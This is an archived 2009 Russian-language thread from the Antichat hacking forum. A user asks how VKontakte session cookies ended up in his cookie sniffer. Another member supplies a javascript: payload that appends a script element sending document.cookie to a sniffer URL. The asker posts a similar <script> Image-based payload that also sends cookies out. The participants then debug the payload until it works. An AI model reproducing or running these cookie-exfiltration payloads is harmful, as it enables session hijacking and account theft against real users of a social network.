ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

18.05.2009, 18:18
|
|
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме: 193561
Репутация:
12
|
|
XSS - контакт
Здравствуйте! Помогие пожалуйсто, вот такая ситуация произошла....я юзаю ачатовский сниффер, но ктото недавно видимо заюзал мой снифф....Но дело не в этом, я вот увидел , что в моем сниффе появились куки от контакта!!! тоесть там было :
Запрос с vkontakte.ru (**.**.****)
QUERY: remixlang=0; __utmz=2010492......ну как пложено в общем
Но проблема в том что в Reffer не показано нечего = (
в реффере вот это :
REFERER: http://vkontakte.ru/id11597***?25*3*
Скажите , что это значит? Вконтакте есть активка о_О ???? Или как можно вапще пощупать эту багу? я заходил на страницу...обычный какойто юзер , нече у него на странице интресного ( скриптов) неувидел(
|
|
|

18.05.2009, 18:21
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме: 1686744
Репутация:
246
|
|
если не ошибаюсь можно зайти вконтакт и потом стереть урл и прописать cниф
Последний раз редактировалось S0ulVortex; 18.05.2009 в 18:24..
|
|
|

18.05.2009, 18:23
|
|
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме: 193561
Репутация:
12
|
|
ага и нечего непроизойдет ( ток что попробовал)
|
|
|

18.05.2009, 18:26
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме: 1686744
Репутация:
246
|
|
плохо пробовал
|
|
|

18.05.2009, 18:30
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме: 1686744
Репутация:
246
|
|
javascript :var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
Как-то так 
|
|
|

18.05.2009, 18:31
|
|
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме: 193561
Репутация:
12
|
|
Сообщение от S0ulVortex
плохо пробовал
В таком случае обьясни плз новичку , что ты имел ввиду, тоесть я зашел вконтакт, стер укр , вписал туда :
<script>img = new Image();img.src = "http://antichat.org/s/*******.gif?"+document.cookie;</script>
Если просто сниф вставить без КСС то будет ПУСТОЙ реффер !!! а кук небудет!
Где ошибка?
|
|
|

18.05.2009, 18:32
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме: 1686744
Репутация:
246
|
|
Сообщение от FatalLerr0r
В таком случае обьясни плз новичку , что ты имел ввиду, тоесть я зашел вконтакт, стер укр , вписал туда :
<script>img = new Image();img.src = "http://antichat.org/s/*******.gif?"+document.cookie;</script>
Где ошибка?
Это тебе не сайт а браузер так не прокатит. 
|
|
|

18.05.2009, 18:35
|
|
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме: 193561
Репутация:
12
|
|
Я понял уже...тока чето
javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
непомогает, "0" !
|
|
|

18.05.2009, 18:36
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме: 1686744
Репутация:
246
|
|
Сообщение от FatalLerr0r
Я понял уже...тока чето
javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
непомогает, "0" !
ПРОБЕЛЫ УБЕРИ
|
|
|

18.05.2009, 18:48
|
|
Познающий
Регистрация: 15.04.2009
Сообщений: 35
Провел на форуме: 193561
Репутация:
12
|
|
Пипеец я ламо...=// Спс биг S0ulVortex ! Все пашет , кулл, терь я понимаю это дело , спс = )
Последний раз редактировалось FatalLerr0r; 18.05.2009 в 18:50..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|